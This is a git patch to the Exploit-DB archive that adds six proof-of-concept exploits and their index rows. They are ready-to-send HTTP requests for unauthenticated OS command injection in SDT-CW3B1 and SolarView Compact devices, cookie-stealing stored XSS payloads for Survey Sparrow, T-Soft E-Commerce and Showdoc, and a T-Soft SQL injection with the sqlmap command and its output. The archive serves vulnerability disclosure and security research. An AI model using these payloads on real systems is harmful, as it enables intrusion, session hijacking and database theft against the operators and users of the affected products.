From cbee98ca482d81e3f88311a561cce55fba9fa72d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 18 May 2022 05:01:36 +0000
Subject: [PATCH] DB: 2022-05-18

6 changes to exploits/shellcodes

SDT-CW3B1 1.1.0 - OS Command Injection
SolarView Compact 6.0 - OS Command Injection
Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)
T-Soft E-Commerce 4 - SQLi (Authenticated)
Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
---
 exploits/hardware/remote/50936.txt  | 20 ++++++++++
 exploits/hardware/remote/50940.txt  | 27 ++++++++++++++
 exploits/multiple/webapps/50937.txt | 20 ++++++++++
 exploits/multiple/webapps/50938.txt | 52 ++++++++++++++++++++++++++
 exploits/multiple/webapps/50939.txt | 58 +++++++++++++++++++++++++++++
 exploits/php/webapps/50941.txt      | 21 +++++++++++
 files_exploits.csv                  |  6 +++
 7 files changed, 204 insertions(+)
 create mode 100644 exploits/hardware/remote/50936.txt
 create mode 100644 exploits/hardware/remote/50940.txt
 create mode 100644 exploits/multiple/webapps/50937.txt
 create mode 100644 exploits/multiple/webapps/50938.txt
 create mode 100644 exploits/multiple/webapps/50939.txt
 create mode 100644 exploits/php/webapps/50941.txt

diff --git a/exploits/hardware/remote/50936.txt b/exploits/hardware/remote/50936.txt
new file mode 100644
index 000000000..799e5547c
--- /dev/null
+++ b/exploits/hardware/remote/50936.txt
@@ -0,0 +1,20 @@
+# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection
+# Date: 2022-05-12
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: 1.0.0
+# Vendor home page : http://telesquare.co.kr/
+# Authentication Required: No
+# CVE : CVE-2021-46422
+
+# Tested on: Windows
+
+# HTTP Request
+GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
+Host: IP_HERE
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
+Accept: */*
+Referer: http:// IP_HERE /admin/system_command.shtml
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
\ No newline at end of file
diff --git a/exploits/hardware/remote/50940.txt b/exploits/hardware/remote/50940.txt
new file mode 100644
index 000000000..40de22e49
--- /dev/null
+++ b/exploits/hardware/remote/50940.txt
@@ -0,0 +1,27 @@
+# Exploit Title: SolarView Compact 6.0 - OS Command Injection
+# Date: 2022-05-15
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: ver.6.00
+# Vendor home page : https://www.contec.com/
+# Authentication Required: No
+# CVE : CVE-2022-29303
+# Tested on: Windows
+
+# Exploit
+# HTTP Request :
+POST /conf_mail.php HTTP/1.1
+Host: HOST_IP
+Content-Length: 77
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://HOST_IP
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://HOST_IP/conf_mail.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+mail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50937.txt b/exploits/multiple/webapps/50937.txt
new file mode 100644
index 000000000..ec972f633
--- /dev/null
+++ b/exploits/multiple/webapps/50937.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
+# Date: May 11 2022
+# Exploit Author: Pankaj Kumar Thakur
+# Vendor Homepage: https://surveysparrow.com/
+# Software Link: https://surveysparrow.com/enterprise-survey-software/
+# Version: 2022
+# Tested on: Windows
+# CVE : CVE-2022-29727
+# References:
+https://www.tenable.com/cve/CVE-2022-29727
+https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022
+
+#POC
+
+For Stored XSS
+
+Visit
+https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
+
+XSS Executed
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50938.txt b/exploits/multiple/webapps/50938.txt
new file mode 100644
index 000000000..60478bcc9
--- /dev/null
+++ b/exploits/multiple/webapps/50938.txt
@@ -0,0 +1,52 @@
+# Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)
+# Exploit Author: Alperen Ergel (alpernae IG/TW)
+# Web Site: https://alperenae.gitbook.io/
+# Software Homepage: https://www.tsoft.com.tr/
+# Version : v4
+# Tested on: Kali Linux
+# Category: WebApp
+# Google Dork: N/A
+# Date: 2022-05-10
+# CVE :N/A
+
+######## Description ########
+#
+# 1-) Login administrator page and add product
+#
+# 2-) add product name to xss payload
+#
+# 3-) Back to web site then will be work payload
+#
+#
+######## Proof of Concept ########
+
+========>>> REQUEST <<<=========
+
+POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1
+Host: domain.com
+Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 1028
+Origin: https://domain.com
+Dnt: 1
+Referer: https://domain.com/srv/admin/products/save-edit/index?id=12
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+
+task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100
+&StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0
+&KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false
+&Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi=
+&TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw=
+&Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20
+izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com%
+2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0
+&UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50939.txt b/exploits/multiple/webapps/50939.txt
new file mode 100644
index 000000000..edcdf9fb3
--- /dev/null
+++ b/exploits/multiple/webapps/50939.txt
@@ -0,0 +1,58 @@
+# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)
+# Exploit Author: Alperen Ergel
+# Contact: @alpernae (IG/TW)
+# Software Homepage: https://www.tsoft.com.tr/
+# Version : v4
+# Tested on: Kali Linux
+# Category: WebApp
+# Google Dork: N/A
+# CVE: 2022-28132
+# Date: 18.02.2022
+######## Description ###########################################
+#
+#
+#
+#	Step-1: Login as Admin or with privilage user
+#	Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path
+#	Step-3: Capture the request save as .txt
+#	Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'
+#	Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'
+#
+#	Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...
+#
+#
+#
+######## Proof of Concept ########################################
+
+========>>> REQUEST <<<=========
+
+GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=
+&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2
+Host: domain.com
+Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=
+Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
+X-Requested-With: XMLHttpRequest
+Sec-Ch-Ua-Mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
+Sec-Ch-Ua-Platform: "Linux"
+Accept: */*
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://domain.com/srv/admin/products/products-v2/index
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+
+=============> RESULTS OF THE SQLMAP <==========================
+
+Parameter: SatisAlt (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20
+---
+back-end DBMS: MySQL 5
+available databases [2]:
+[*] d25082_db
+[*] information_schema
+
+[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
\ No newline at end of file
diff --git a/exploits/php/webapps/50941.txt b/exploits/php/webapps/50941.txt
new file mode 100644
index 000000000..0a7022b25
--- /dev/null
+++ b/exploits/php/webapps/50941.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
+# Exploit Author: Akshay Ravi
+# Vendor Homepage: https://github.com/star7th/showdoc
+# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
+# Version: <= 2.10.3
+# Tested on: macOS Monterey
+# CVE : CVE-2022-0967
+
+Description: Stored XSS via uploading file in .ofd format
+
+1. Create a file with .ofd extension and add XSS Payload inside the file
+
+	filename = "payload.ofd"
+	payload = "<script>alert(1)</script>"
+
+2. Login to showdoc v2.10.2 and go to file library
+
+	Endpoint = "https://www.site.com/attachment/index"
+
+3. Upload the payload on file library and click on the check button
+4. The XSS payload will executed once we visited the URL
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 979bcefd8..3cb376b94 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18695,6 +18695,8 @@ id,file,description,date,author,type,platform,port
 50918,exploits/python/remote/50918.txt,"PyScript - Read Remote Python Source Code",1970-01-01,"Momen Eldawakhly",remote,python,
 50919,exploits/hardware/remote/50919.txt,"DLINK DAP-1620 A1 v1.01 - Directory Traversal",1970-01-01,"Momen Eldawakhly",remote,hardware,
 50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Minh Khoa",remote,hardware,
+50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",1970-01-01,"Ahmed Alroky",remote,hardware,
+50940,exploits/hardware/remote/50940.txt,"SolarView Compact 6.0 - OS Command Injection",1970-01-01,"Ahmed Alroky",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44998,3 +45000,7 @@ id,file,description,date,author,type,platform,port
 50933,exploits/php/webapps/50933.txt,"College Management System 1.0 - 'course_code' SQL Injection (Authenticated)",1970-01-01,"Eren Gozaydin",webapps,php,
 50934,exploits/php/webapps/50934.txt,"Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)",1970-01-01,"Eren Gozaydin",webapps,php,
 50935,exploits/hardware/webapps/50935.txt,"TLR-2005KSH - Arbitrary File Delete",1970-01-01,"Ahmed Alroky",webapps,hardware,
+50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Pankaj Kumar Thakur",webapps,multiple,
+50938,exploits/multiple/webapps/50938.txt,"T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)",1970-01-01,"Alperen Ergel",webapps,multiple,
+50939,exploits/multiple/webapps/50939.txt,"T-Soft E-Commerce 4 - SQLi (Authenticated)",1970-01-01,"Alperen Ergel",webapps,multiple,
+50941,exploits/php/webapps/50941.txt,"Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Akshay Ravi",webapps,php,